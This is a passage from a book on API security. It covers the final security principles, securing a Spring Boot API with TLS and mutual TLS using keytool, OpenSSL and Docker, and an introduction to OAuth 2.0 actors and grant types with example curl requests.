simple as possible. • With complete mediation principle, a system should validate access rights to all its resources to ensure whether they’re allowed to access or not. • The open design principle highlights the importance of building a system in an open manner—with no secrets, confidential algorithms. • The principle of separation of privilege states that a system should not grant permissions based on a single condition. • The principle of least common mechanism concerns the risk of sharing state information among different components. Chapter 2 Designing seCurity for apis 67 • The principle of psychological acceptability states that security mechanisms should not make the resource more difficult to access than if the security mechanisms were not present. • Confidentiality, integrity, and availability (CIA), widely known as the triad of information security, are three key factors used in benchmarking information systems security. Chapter 2 Designing seCurity for apis 69 © Prabath Siriwardena 2020 P. 
Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_3 CHAPTER 3 Securing APIs with Transport Layer Security (TLS) Securing APIs with Transport Layer Security (TLS) is the most common form of protection we see in any API deployment. If you are new to TLS, please check Appendix C first, which explains TLS in detail and how it works. In securing APIs, we use TLS to secure or encrypt the communication—or protect the data in transit—and also we use TLS mutual authentication to make sure only the legitimate clients can access the APIs. In this chapter, we discuss how to deploy an API implemented in Java Spring Boot, enable TLS, and protect an API with mutual TLS. Setting Up the Environment In this section, we’ll see how we can develop an API using Spring Boot from scratch. Spring Boot (https://projects.spring.io/spring-boot/) is the most popular microservices development framework for Java developers. To be precise, Spring Boot offers an opinionated1 runtime for Spring, which takes out a lot of complexities. Even though Spring Boot is opinionated, it also gives developers to override many of its default picks. Due to the fact that many Java developers are familiar with Spring, and the ease of development is a key success factor in the microservices world, many adopted Spring Boot. Even for Java developers who are not using Spring, still it is a household name. If you have worked on Spring, you surely would have worried how painful it was 1 An opinionated framework locks or guides its developers into its own way of doing things. 70 to deal with large, chunky XML configuration files. Unlike Spring, Spring Boot believes in convention over configuration—no more XML hell! In this book, we use Spring Boot to implement our APIs. Even if you are not familiar with Java, you will be able to get started with no major learning curve, as we provide all the code examples. To run the samples, you will need Java 8 or latest, Maven 3.2 or latest, and a git client. Once you are successfully done with the installation, run the following two commands in the command line to make sure everything is working fine. If you’d like some help in setting up Java or Maven, there are plenty of online resources out there. \>java -version java version "1.8.0_121" Java(TM) SE Runtime Environment (build 1.8.0_121- b13) Java HotSpot(TM) 64-Bit Server VM (build 25.121-b13, mixed mode) \>mvn -version Apache Maven 3.5.0 (ff8f5e7444045639af65f6095c62210b5713f426; 2017-04- 03T12:39:06-07:00) Maven home: /usr/local/Cellar/maven/3.5.0/libexec Java version: 1.8.0_121, vendor: Oracle Corporation Java home: /Library/Java/JavaVirtualMachines/jdk1.8.0_121.jdk/Contents/ Home/jre Default locale: en_US, platform encoding: UTF-8 OS name: "mac os x", version: "10.12.6", arch: "x86_64", family: "mac All the samples used in this book are available in the https://github.com/ apisecurity/samples.git git repository. Use the following git command to clone it. All the samples related to this chapter are inside the directory ch03. \> git clone https://github.com/apisecurity/samples.git \> cd samples/ch03 To anyone who loves Maven, the best way to get started with a Spring Boot project would be with a Maven archetype. Unfortunately, it is no more supported. One option we have is to create a template project via https://start.spring.io/ –which is known as the Spring Initializer. There you can pick which type of project you want to create, project dependencies, give a name, and download a maven project as a zip file. 
The other option is to use the Spring Tool Suite (STS).2 It’s an IDE (integrated development 2 https://spring.io/tools Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 71 environment) built on top of the Eclipse platform, with many useful plugins to create Spring projects. However, in this book, we provide you all the fully coded samples in the preceding git repository. Note if you find any issues in building or running the samples given in this book, please refer to the reaDMe file under the corresponding chapter in the git repository: https://github.com/apisecurity/samples.git. we will update the samples and the corresponding reaDMe files in the git repository, to reflect any changes happening, related to the tools, libraries, and frameworks used in this book. Deploying Order API This is the simplest API ever. You can find the code inside the directory ch03/sample01. To build the project with Maven, use the following command: \> cd sample01 \> mvn clean install Before we delve deep into the code, let’s have a look at some of the notable Maven dependencies and plugins added into ch03/sample01/pom.xml. Spring Boot comes with different starter dependencies to integrate with different Spring modules. The spring-boot-starter-web dependency brings in Tomcat and Spring MVC and, does all the wiring between the components, making the developer’s work to a minimum. The spring-boot-starter-actuator dependency helps you monitor and manage your application. <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> </dependency> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-actuator</artifactId> </dependency> Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 72 In the pom.xml file, we also have the spring-boot-maven-plugin plugin, which lets you start the Spring Boot API from Maven itself. <plugin> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-maven-plugin</artifactId> </plugin> Now let’s have a look at the checkOrderStatus method in the class file src/ main/java/com/apress/ch03/sample01/service/OrderProcessing.java. This method accepts an order id and returns back the status of the order. There are three notable annotations used in the following code. The @RestController is a class-level annotation that marks the corresponding class as a REST endpoint, which accepts and produces JSON payloads. The @RequestMapping annotation can be defined both at the class level and the method level. The value attribute at the class-level annotation defines the path under which the corresponding endpoint is registered. The same at the method level appends to the class-level path. Anything defined within curly braces is a placeholder for any variable value in the path. For example, a GET request on /order/101 and /order/102 (where 101 and 102 are the order ids), both hit the method checkOrderStatus. In fact, the value of the value attribute is a URI template.3 The annotation @PathVariable extracts the provided variable from the URI template defined under the value attribute of the @RequestMapping annotation and binds it to the variable defined in the method signature. 
@RestController @RequestMapping(value = "/order") public class OrderProcessing { @RequestMapping(value = "/{id}", method = RequestMethod.GET) public String checkOrderStatus(@PathVariable("id") String orderId) { return ResponseEntity.ok("{'status' : 'shipped'}"); } } 3 https://tools.ietf.org/html/rfc6570 Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 73 There is another important class file at src/main/java/com/apress/ch03/sample01/ OrderProcessingApp.java worth having a look at. This is the class which spins up our API in its own application server, in this case the embedded Tomcat. By default the API starts on port 8080, and you can change the port by adding, say, for example, server.port=9000 to the sample01/src/main/resources/application.properties file. This will set the server port to 9000. The following shows the code snippet from OrderProcessingApp class, which spins up our API. The @SpringBootApplication annotation, which is defined at the class level, is being used as a shortcut for four other annotations defined in Spring: @Configuration, @EnableAutoConfiguration, @EnableWebMvc, and @ComponentScan. @SpringBootApplication public class OrderProcessingApp { public static void main(String[] args) { SpringApplication.run(OrderProcessingApp.class, args); } } Now, let’s see how to run our API and talk to it with a cURL client. The following command executed from ch03/sample01 directory shows how to start our Spring Boot application with Maven. \> mvn spring-boot:run To test the API with a cURL client, use the following command from a different command console. It will print the output as shown in the following, after the initial command. \> curl http://localhost:8080/order/11 {"customer_id":"101021","order_id":"11","payment_method":{"card_type":"V ISA","expiration":"01/22","name":"John Doe","billing_address":"201, 1st Street, San Jose, CA"},"items": [{"code":"101","qty":1},{"code":"103","qty" :5}],"shipping_address":"201, 1st Street, San Jose, CA"} Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 74 Securing Order API with Transport Layer Security (TLS) To enable Transport Layer Security (TLS), first we need to create a public/private key pair. The following command uses keytool that comes with the default Java distribution to generate a key pair and stores it in keystore.jks file. This file is also known as a keystore, and it can be in different formats. Two most popular formats are Java KeyStore (JKS) and PKCS#12. JKS is specific to Java, while PKCS#12 is a standard, which belongs to the family of standards defined under Public Key Cryptography Standards (PKCS). In the following command, we specify the keystore type with the storetype argument, which is set to JKS. \> keytool -genkey -alias spring -keyalg RSA -keysize 4096 -validity 3650 -dname "CN=foo,OU=bar,O=zee,L=sjc,S=ca,C=us" -keypass springboot -keystore keystore.jks -storeType jks -storepass springboot The alias argument in the preceding command specifies how to identify the generated keys stored in the keystore. There can be multiple keys stored in a given keystore, and the value of the corresponding alias must be unique. Here we use spring as the alias. The validity argument specifies that the generated keys are only valid for 10 years or 3650 days. The keysize and keystore arguments specify the length of the generated key and the name of the keystore, where the keys are stored. 
The genkey is the option, which instructs the keytool to generate new keys; instead of genkey, you can also use genkeypair option. Once the preceding command is executed, it will create a keystore file called keystore.jks, which is protected with the password springboot. The certificate created in this example is known as a self-signed certificate. In other words, there is no external certificate authority (CA). Typically, in a production deployment, either you will use a public certificate authority or an enterprise-level certificate authority to sign the public certificate, so any client, who trusts the certificate authority, can verify it. If you are using certificates to secure service-to-service communications in a microservices deployment or for an internal API deployment, then you need not worry about having a public certificate authority; you can have your own certificate authority. But for APIs, which you expose to external client applications, you would need to get your certificates signed by a public certificate authority. To enable TLS for the Spring Boot API, copy the keystore file (keystore.jks), which we created earlier, to the home directory of the sample (e.g., ch03/sample01/) and add Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 75 the following to the sample01/src/main/resources/application.properties file. The samples that you download from the samples git repository already have these values (and you only need to uncomment them), and we are using springboot as the password for both the keystore and the private key. server.ssl.key-store: keystore.jks server.ssl.key-store-password: springboot server.ssl.keyAlias: spring To validate that everything works fine, use the following command from ch03/ sample01/ directory to spin up the Order API and notice the line which prints the HTTPS port. \> mvn spring-boot:run Tomcat started on port(s): 8080 (https) with context path " To test the API with a cURL client, use the following command from a different command console. It will print the output as shown in the following, after the initial command. Instead of HTTP, we are using HTTPS here. \> curl –k https://localhost:8080/order/11 {"customer_id":"101021","order_id":"11","payment_method":{"card_type":"V ISA","expiration":"01/22","name":"John Doe","billing_address":"201, 1st Street, San Jose, CA"},"items": [{"code":"101","qty":1},{"code":"103","qty" :5}],"shipping_address":"201, 1st Street, San Jose, CA"} We used the -k option in the preceding cURL command. Since we have a self-signed (untrusted) certificate to secure our HTTPS endpoint, we need to pass the –k parameter to advise cURL to ignore the trust validation. In a production deployment with proper certificate authority–signed certificates, you do not need to do that. Also, if you have a self- signed certificate, you can still avoid using –k, by pointing cURL to the corresponding public certificate. \> curl --cacert ca.crt https://localhost:8080/order/11 You can use the following keytool command from ch03/sample01/ to export the public certificate of the Order API to ca.crt file in PEM (with the -rfc argument) format. \> keytool -export -file ca.crt -alias spring –rfc -keystore keystore.jks -storePass springboot Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 76 The preceding curl command with the ca.crt will result in the following error. It complains that the common name in the public certificate of the Order API, which is foo, does not match with the hostname (localhost) in the cURL command. 
curl: (51) SSL: certificate subject name 'foo' does not match target host name 'localhost' Ideally in a production deployment when you create a certificate, its common name should match the hostname. In this case, since we do not have a Domain Name Service (DNS) entry for the foo hostname, you can use the following workaround, with cURL. \> curl --cacert ca.crt https://foo:8080/order/11 --resolve foo:8080:127.0.0.1 Protecting Order API with Mutual TLS In this section, we’ll see how to enable TLS mutual authentication between the Order API and the cURL client. In most of the cases, TLS mutual authentication is used to enable system-to-system authentication. First make sure that we have the keystore at sample01/ keystore.jks, and then to enable TLS mutual authentication, uncomment the following property in the sample01/src/main/resources/application.properties file. server.ssl.client-auth:need Now we can test the flow by invoking the Order API using cURL. First, use the following command from ch03/sample01/ directory to spin up the Order API and notice the line which prints the HTTPS port. \> mvn spring-boot:run Tomcat started on port(s): 8080 (https) with context path '' To test the API with a cURL client, use the following command from a different command console. \> curl –k https://localhost:8080/order/11 Since we have protected the API with TLS mutual authentication, the preceding command will result in the following error message, which means the API (or the server) has refused to connect with the cURL client, because it didn’t present a valid client certificate. Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 77 curl: (35) error:1401E412:SSL routines:CONNECT_CR_FINISHED:sslv3 alert bad certificate To fix this, we need to create a key pair (a public key and a private key) for the cURL client and configure Order API to trust the public key. Then we can use the key pair we generated along with the cURL command to access the API, which is protected with mutual TLS. To generate a private key and a public key for the cURL client, we use the following OpenSSL command. OpenSSL is a commercial-grade toolkit and cryptographic library for TLS and available for multiple platforms. You can download and set up the distribution that fits your platform from www.openssl.org/source. If not, the easiest way is to use an OpenSSL Docker image. In the next section, we discuss how to run OpenSSL as a Docker container. \> openssl genrsa -out privkey.pem 4096 Now, to generate a self-signed certificate, corresponding to the preceding private key (privkey.pem), use the following OpenSSL command. \> openssl req -key privkey.pem -new -x509 -sha256 -nodes -out client.crt -subj "/C=us/ST=ca/L=sjc/O=zee/OU=bar/CN=client" Let’s take down the Order API, if it is still running, and import the public certificate (client.crt) we created in the preceding step to sample01/keystore.jks, using the following command. \> keytool -import -file client.crt -alias client -keystore keystore.jks -storepass springboot Now we can test the flow by invoking the Order API using cURL. First, use the following command from ch03/sample01/ directory to spin up the Order API. \> mvn spring-boot:run Tomcat started on port(s): 8080 (https) with context path '' To test the API with a cURL client, use the following command from a different command console. 
\> curl -k --key privkey.pem --cert client.crt https://localhost:8080/ order/11 Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 78 In case we use a key pair, which is not known to the Order API, or in other words not imported into the sample01/keystore.jks file, you will see the following error, when you execute the preceding cURL command. curl: (35) error:1401E416:SSL routines:CONNECT_CR_FINISHED:sslv3 alert certificate unknown Running OpenSSL on Docker In the last few years, Docker revolutionized the way we distribute software. Docker provides a containerized environment to run software in self-contained manner. A complete overview of Docker is out of the scope of this book—and if you are interested in learning more, we recommend you check out the book Docker in Action (Manning Publications, 2019) by Jeff Nickoloff and Stephen Kuenzli. Setting up Docker in your local machine is quite straightforward, following the steps in Docker documentation available at https://docs.docker.com/install/. Once you get Docker installed, run the following command to verify the installation, and it will show the version of Docker engine client and server. \> docker version To start OpenSSL as a Docker container, use the following command from the ch03/ sample01 directory. \> docker run -it -v $(pwd):/export prabath/openssl # When you run the preceding command for the first time, it will take a couple of minutes to execute and ends with a command prompt, where you can execute your OpenSSL commands to create the keys, which we used toward the end of the previous sections. The preceding docker run command starts OpenSSL in a Docker container, with a volume mount, which maps ch03/sample01 (or the current directory, which is indicated by $(pwd) in the preceding command) directory from the host file system to the /export directory of the container file system. This volume mount helps you to share part of the host file system with the container file system. When the OpenSSL container generates certificates, those are written to the /export directory of the container file system. Since Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 79 we have a volume mount, everything inside the /export directory of the container file system is also accessible from the ch03/sample01 directory of the host file system. To generate a private key and a public key for the cURL client, we use the following OpenSSL command. # openssl genrsa -out /export/privkey.pem 4096 Now, to generate a self-signed certificate, corresponding to the preceding private key (privkey.pem), use the following OpenSSL command. # openssl req -key /export/privkey.pem -new -x509 -sha256 -nodes -out client.crt -subj "/C=us/ST=ca/L=sjc/O=zee/OU=bar/CN=client" Summary • Transport Layer Security (TLS) is fundamental in securing any API. • Securing APIs with TLS is the most common form of protection we see in any API deployment. • TLS protects data in transit for confidentiality and integrity, and mutual TLS (mTLS) protects your APIs from intruders by enforcing client authentication. • OpenSSL is a commercial-grade toolkit and cryptographic library for TLS and available for multiple platforms. Chapter 3 SeCuring apiS with tranSport Layer SeCurity (tLS) 81 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_4 CHAPTER 4 OAuth 2.0 Fundamentals OAuth 2.0 is a major breakthrough in identity delegation. 
It has its roots in OAuth 1.0 (see Appendix B), but OAuth Web Resource Authorization Profiles (see Appendix B) primarily influenced it. The main difference between OAuth 1.0 and 2.0 is that OAuth 1.0 is a standard protocol for identity delegation, whereas OAuth 2.0 is a highly extensible authorization framework. OAuth 2.0 is already the de facto standard for securing APIs and is widely used by Facebook, Google, LinkedIn, Microsoft (MSN, Live), PayPal, Instagram, Foursquare, GitHub, Yammer, Meetup, and many more. There is one popular exception: Twitter still uses OAuth 1.0. Understanding OAuth 2.0 OAuth 2.0 primarily solves the access delegation problem. Let’s say you want a third- party application to read your status messages on your Facebook wall. In other words, you want to delegate the third-party application the access to your Facebook wall. One way to do that is by sharing your Facebook credentials with the third-party application, so it can directly access your Facebook wall. This is called access delegation by credential sharing. Even though this solves the access delegation problem, once you share your Facebook credentials with the third-party application, it can use your credentials to do anything it wants, which in turns creates more problems! OAuth 2.0 solves this problem in a way you do not need to share your credentials with third-party applications, but only share a time-bound temporary token that is only good enough for a well-defined 82 purpose. Figure 4-1 shows at a high level how access delegation works with OAuth 2.0, and the following explains each step in Figure 4-1: 1. The user visits the third-party web application and wants to let the web application publish messages to his/her Facebook wall. To do that, the web application needs a token from Facebook, and to get the token, it redirects the user to Facebook. 2. Facebook prompts the user to authenticate (if not authenticated already) and requests the consent from the user to give permissions to the third-party web application to publish messages to his/her Facebook wall. 3. User authenticates and provides his/her consent to Facebook, so that Facebook can share a token with the third-party web application. This token is only good enough to publish messages to the Facebook wall for a limited period and cannot do anything else. For example, the third-party web application cannot send friend requests, delete status messages, upload photos, and so on with the token. 4. The third-party web application gets a token from Facebook. To explain what exactly happens in this step, first we need to understand how OAuth 2.0 grant types work, and we discuss that later in the chapter. 5. The third-party web application accesses the Facebook API with the token provided to it by Facebook in step 4. Facebook API makes sure only requests that come along with a valid token can access it. Then again later in the chapter, we will explain in detail what happens in this step. Chapter 4 Oauth 2.0 Fundamentals 83 OAuth 2.0 Actors OAuth 2.0 introduces four actors in a typical OAuth flow. The following explains the role of each of them with respect to Figure 4-1: 1. Resource owner: One who owns the resources. In our example earlier, the third- party web application wants to access the Facebook wall of a Facebook user via the Facebook API and publish messages on behalf of him/her. In that case, the Facebook user who owns the Facebook wall is the resource owner. 2. Resource server: This is the place which hosts protected resources. 
In the preceding scenario, the server that hosts the Facebook API is the resource server, where Facebook API is the resource. 3. Client: This is the application which wants to access a resource on behalf of the resource owner. In the preceding use case, the third- party web application is the client. Figure 4-1. OAuth 2.0 solves the access delegation problem by issuing a temporary time-bound token to a third-party web application that is only good enough for a well- defined purpose Chapter 4 Oauth 2.0 Fundamentals 84 4. Authorization server: This is the entity which acts as a security token service to issue OAuth 2.0 access tokens to client applications. In the preceding use case, Facebook itself acts as the authorization server. Grant Types A grant type in OAuth 2.0 defines how a client can obtain an authorization grant from a resource owner to access a resource on his/her behalf. The origin of the word grant comes from the French word granter which carries the meaning consent to support. In other words, a grant type defines a well-defined process to get the consent from the resource owner to access a resource on his/her behalf for a well-defined purpose. In OAuth 2.0, this well-defined purpose is also called scope. Also you can interpret scope as a permission, or in other words, scope defines what actions the client application can do on a given resource. In Figure 4-1, the token issued from the Facebook authorization server is bound to a scope, where the client application can only use the token to post messages to the corresponding user’s Facebook wall. The grant types in OAuth 2.0 are very similar to the OAuth profiles in WRAP (see Appendix B). The OAuth 2.0 core specification introduces four core grant types: the authorization code grant type, the implicit grant type, the resource owner password credentials grant type, and the client credentials grant type. Table 4-1 shows how OAuth 2.0 grant types match with WRAP profiles. Table 4-1. OAuth 2.0 Grant Types vs. OAuth WRAP Profiles OAuth 2.0 OAuth WRAP authorization code grant type Web app profile/rich app profile Implicit grant type – resource owner password credentials grant type username and password profile Client credentials grant type Client account and password profile Chapter 4 Oauth 2.0 Fundamentals 85 Authorization Code Grant Type The authorization code grant type in OAuth 2.0 is very similar to the Web App Profile in WRAP. It’s mostly recommended for applications—either web applications or native mobile applications—that have the capability to spin up a web browser (see Figure 4- 2). The resource owner who visits the client application initiates the authorization code grant type. The client application, which must be a registered application at the authorization server, as shown in step 1 in Figure 4-2, redirects the resource owner to the authorization server to get the approval. The following shows an HTTP request the client application generates while redirecting the user to the authorize endpoint of the authorization server: https://authz.example.com/oauth2/authorize? response_type=code& client_id=0rhQErXIX49svVYoXJGt0DWBuFca& redirect_uri=https%3A%2F%2Fmycallback The authorize endpoint is a well-known, published endpoint of an OAuth 2.0 authorization server. The value of response_type parameter must be code. This indicates to the authorization server that the request is for an authorization code (under the authorization code grant type). client_id is an identifier for the client application. 
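As a minimal sketch of how a client application could assemble this redirect, the following Java snippet builds the same authorization request URL, URL-encoding the redirect_uri value. The endpoint, client_id, and redirect_uri are the example values used above; the class itself is only illustrative and not part of any OAuth library or of the book's sample repository.

import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;

public class AuthorizationRequestBuilder {

    public static void main(String[] args) throws UnsupportedEncodingException {
        String authorizeEndpoint = "https://authz.example.com/oauth2/authorize";
        String clientId = "0rhQErXIX49svVYoXJGt0DWBuFca";
        String redirectUri = "https://mycallback";

        // response_type=code tells the authorization server we want an authorization code.
        String url = authorizeEndpoint
                + "?response_type=code"
                + "&client_id=" + URLEncoder.encode(clientId, "UTF-8")
                + "&redirect_uri=" + URLEncoder.encode(redirectUri, "UTF-8");
        // Optionally, append &scope=... to indicate the level of access the client needs.

        // The client application redirects the resource owner's browser to this URL.
        System.out.println(url);
    }
}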
Once the client application is registered with the authorization server, the client gets a client_id and a client_secret. During the client registration phase, the client application must provide a URL under its control as the redirect_uri, and in the initial request, the value of the redirect_uri parameter should match with the one registered with the authorization server. We also call the redirect_uri the callback URL. The URL-encoded value of the callback URL is added to the request as the redirect_uri parameter. In addition to these parameters, a client application can also include the scope parameter. The value of the scope parameter is shown to the resource owner on the approval screen: it indicates to the authorization server the level of access the client needs on the target resource/API. Chapter 4 Oauth 2.0 Fundamentals 86 In step 5 in Figure 4-2, the authorization server returns the requested code to the registered callback URL (also known as redirect_uri) of the client application. This code is called the authorization code. Each authorization code should have a lifetime. A lifetime longer than 1 minute isn’t recommended: https://callback.example.com/?code=9142d4cad58c66d0a5edfad8952192 The value of the authorization code is delivered to the client application via an HTTP redirect and is visible to the resource owner. In the next step (step 6), the client must exchange the authorization code for an OAuth access token by talking to the OAuth token endpoint exposed by the authorization server. Note the ultimate goal of any Oauth 2.0 grant type is to provide a token (which is known as access token) to the client application. the client application can use this token to access a resource. an access token is bound to the resource owner, client application, and one or more scopes. Given an access token, the authorization server knows who the corresponding resource owner and client application and also what the attached scopes are. Figure 4-2. Authorization code grant type Chapter 4 Oauth 2.0 Fundamentals 87 The token endpoint in most of the cases is a secured endpoint. The client application can generate the token request along with the corresponding client_id (0rhQErXIX49s vVYoXJGt0DWBuFca) and the client_secret (eYOFkL756W8usQaVNgCNkz9C2D0a), which will go in the HTTP Authorization header. In most of the cases, the token endpoint is secured with HTTP Basic authentication, but it is not a must. For stronger security, one may use mutual TLS as well, and if you are using the authorization code grant type from a single-page app or a mobile app, then you may not use any credentials at all. The following shows a sample request (step 6) to the token endpoint. The value of the grant_type parameter there must be the authorization_code, and the value of the code should be the one returned from the previous step (step 5). If the client application sent a value in the redirect_uri parameter in the previous request (step 1), then it must include the same value in the token request as well. In case the client application does not authenticate to the token endpoint, you need to send the corresponding client_id as a parameter in the HTTP body: Note the authorization code returned from the authorization server acts as an intermediate code. this code is used to map the end user or resource owner to the Oauth client. the Oauth client may authenticate itself to the token endpoint of the authorization server. 
the authorization server should check whether the code is issued to the authenticated Oauth client prior to exchanging it for an access token. \> curl -v –k -X POST --basic -u 0rhQErXIX49svVYoXJGt0DWBuFca:eYOFkL756W8usQaVNgCNkz9C2D0a -H "Content-Type:application/x-www-form-urlencoded;charset=UTF-8" -d "grant_type=authorization_code& code=9142d4cad58c66d0a5edfad8952192& redirect_uri=https://mycallback" https://authz.example.com/oauth2/token Note the authorization code should be used only once by the client. If the authorization server detects that it’s been used more than once, it must revoke all the tokens issued for that particular authorization code. Chapter 4 Oauth 2.0 Fundamentals 88 The preceding cURL command returns the following response from the authorization server (step 7). The token_type parameter in the response indicates the type of the token. (The section “OAuth 2.0 Token Types” talks more about token types.) In addition to the access token, the authorization server also returns a refresh token, which is optional. The refresh token can be used by the client application to obtain a new access token before the refresh token expires. The expires_in parameter indicates the lifetime of the access token in seconds. { "token_type":"bearer", "expires_in":3600, "refresh_token":"22b157546b26c2d6c0165c4ef6b3f736", "access_token":"cac93e1d29e45bf6d84073dbfb460" } Note each refresh token has its own lifetime. Compared to the lifetime of the access token, the refresh token’s is longer: the lifetime of an access token is in minutes, whereas the lifetime of a refresh token is in days. Implicit Grant Type The implicit grant type to acquire an access token is mostly used by JavaScript clients running in the web browser (see Figure 4-3). Even for JavaScript clients now, we do not recommend using implicit grant type, rather use authorization code grant type with no client authentication. This is mostly due to the inherent security issues in the implicit grant type, which we discuss in Chapter 14. The following discussion on implicit grant type will help you understand how it works, but never use it in a production deployment. Chapter 4 Oauth 2.0 Fundamentals 89 Unlike the authorization code grant type, the implicit grant type doesn’t have any equivalent profiles in OAuth WRAP. The JavaScript client initiates the implicit grant flow by redirecting the user to the authorization server. The response_type parameter in the request indicates to the authorization server that the client expects a token, not a code. The implicit grant type doesn’t require the authorization server to authenticate the JavaScript client; it only has to send the client_id in the request. This is for logging and auditing purposes and also to find out the corresponding redirect_uri. The redirect_uri in the request is optional; if it’s present, it must match what is provided at the client registration: https://authz.example.com/oauth2/authorize? response_type=token& client_id=0rhQErXIX49svVYoXJGt0DWBuFca& redirect_uri=https%3A%2F%2Fmycallback This returns the following response. The implicit grant type sends the access token as a URI fragment and doesn’t provide any refreshing mechanism: https://callback.example.com/#access_token=cac93e1d29e45bf6d84073dbfb460&ex pires_in=3600 Unlike the authorization code grant type, the implicit grant type client receives the access token in the response to the grant request. When we have something in the URI fragment of a URL, the browser never sends it to the back end. 
It only stays on the browser. So when authorization server sends a redirect to the callback URL of the client Figure 4-3. Implicit grant type Chapter 4 Oauth 2.0 Fundamentals 90 application, the request first comes to the browser, and the browser does an HTTP GET to the web server that hosts the client application. But in that HTTP GET, you will not find the URI fragment, and the web server will never see it. To process the access token that comes in the URI fragment, as a response to HTTP GET from the browser, the web server of the client application will return back an HTML page with a JavaScript, which knows how to extract the access_token from the URI fragment, which still remains in the browser address bar. In general this is how single-page applications work. Note the authorization server must treat the authorization code, access token, refresh token, and client secret key as sensitive data. they should never be sent over http—the authorization server must use transport layer security (tls). these tokens should be stored securely, possibly by encrypting or hashing them. Resource Owner Password Credentials Grant Type Under the resource owner password credentials grant type, the resource owner must trust the client application. This is equivalent to the Username and Password Profile in OAuth WRAP. The resource owner has to give his/her credentials directly to the client application (see Figure 4-4). The following cURL command talks to the token endpoint of the authorization server, passing the resource owner’s username and password as parameters. In addition, Figure 4-4. Resource owner password credentials grant type Chapter 4 Oauth 2.0 Fundamentals 91 the client application proves its identity. In most of the cases, the token endpoint is secured with HTTP Basic authentication (but not a must), and the client application passes its client_id (0rhQErXIX49svVYoXJGt0DWBuFca) and client_secret (eYOFkL756W8usQaVNgCNkz9C2D0a) in the HTTP Authorization header. The value of the grant_type parameter must be set to password: \> curl -v -k -X POST --basic -u 0rhQErXIX49svVYoXJGt0DWBuFca:eYOFkL756W8usQaVNgCNkz9C2D0a -H "Content-Type:application/x-www-form-urlencoded;charset=UTF-8" -d "grant_type=password& username=admin&password=admin" https://authz.example.com/oauth2/token This returns the following response, which includes an access token along with a refresh token: { "token_type":"bearer", "expires_in":685," "refresh_token":"22b157546b26c2d6c0165c4ef6b3f736", "access_token":"cac93e1d29e45bf6d84073dbfb460" } Note If using the authorization code grant type is an option, it should be used over the resource owner password credentials grant type. the resource owner password credentials grant type was introduced to aid migration from http Basic authentication and digest authentication to Oauth 2.0. Client Credentials Grant Type The client credentials grant type is equivalent to the Client Account and Password Profile in OAuth WRAP and to two-legged OAuth in OAuth 1.0 (see Appendix B). With this grant type, the client itself becomes the resource owner (see Figure 4-5). The following cURL command talks to the token endpoint of the authorization server, passing the client application’s client_id (0rhQErXIX49svVYoXJGt0DWBuFca) and client_secret (eYOFkL756W8usQaVNgCNkz9C2D0a). 
Chapter 4 Oauth 2.0 Fundamentals 92 \> curl –v –k -X POST --basic -u 0rhQErXIX49svVYoXJGt0DWBuFca:eYOFkL756W8usQaVNgCNkz9C2D0a -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" -d "grant_type=client_credentials" https://authz.example.com/oauth2/token This returns the following response, which includes an access token. Unlike the resource owner password credentials grant type, the client credentials grant type doesn’t return a refresh token: { "token_type":"bearer", "expires_in":3600, "access_token":"4c9a9ae7463ff9bb93ae7f169bd6a" } This client credential grant type is mostly used for system-to-system interactions with no end user. For example, a web application needs to access an OAuth secured API to get some metadata. Refresh Grant Type Although it’s not the case with the implicit grant type and the client credentials grant type, with the other two grant types, the OAuth access token comes with a refresh token. This refresh token can be used to extend the validity of the access token without the involvement of the resource owner. The following cURL command shows how to get a new access token from the refresh token: Figure 4-5. Client credentials grant type Chapter 4 Oauth 2.0 Fundamentals 93 \> curl -v -X POST --basic -u 0rhQErXIX49svVYoXJGt0DWBuFca:eYOFkL756W8usQaVNgCNkz9C2D0a -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" -k -d "grant_type=refresh_token& refresh_token=22b157546b26c2d6c0165c4ef6b3f736" https://authz.example.com/oauth2/token This returns the following response: { "token_type":"bearer", "expires_in":3600, "refresh_token":"9ecc381836fa5e3baf5a9e86081", "access_token":"b574d1ba554c26148f5fca3cceb05e2" } Note the refresh token has a much longer lifetime than the access token. If the lifetime of the refresh token expires, then the client must initiate the Oauth token flow from the start and get a new access token and refresh token. the authorization server also has the option to return a new refresh token each time the client refreshes the access token. In such cases, the client has to discard the previously obtained refresh token and begin using the new one. How to Pick the Right Grant Type? As we discussed at the very beginning of the chapter, OAuth 2.0 is an authorization framework. The nature of a framework is to provide multiple options, and it’s up to the application developers to pick the best out of those options, based on their use cases. OAuth can be used with any kind of application. It can be a web application, single-page application, desktop application, or a native mobile application. To pick the right grant type for those applications, first we need to think how the client application is going to invoke the OAuth secured API: whether it is going to access the API by itself or on behalf of an end user. If the application wants to access the API just being itself, then we should use client credentials grant type and, if not, should use authorization code grant type. Both the implicit and password grant types are now obsolete. Chapter 4 Oauth 2.0 Fundamentals 94 OAuth 2.0 Token Types Neither OAuth 1.0 nor WRAP could support custom token types. OAuth 1.0 always used signature-based tokens, and OAuth WRAP always used bearer tokens over TLS. OAuth 2.0 isn’t coupled into any token type. In OAuth 2.0, you can introduce your own token type if needed. Regardless of the token_type returned in the OAuth token response from the authorization server, the client must understand it before using it. 
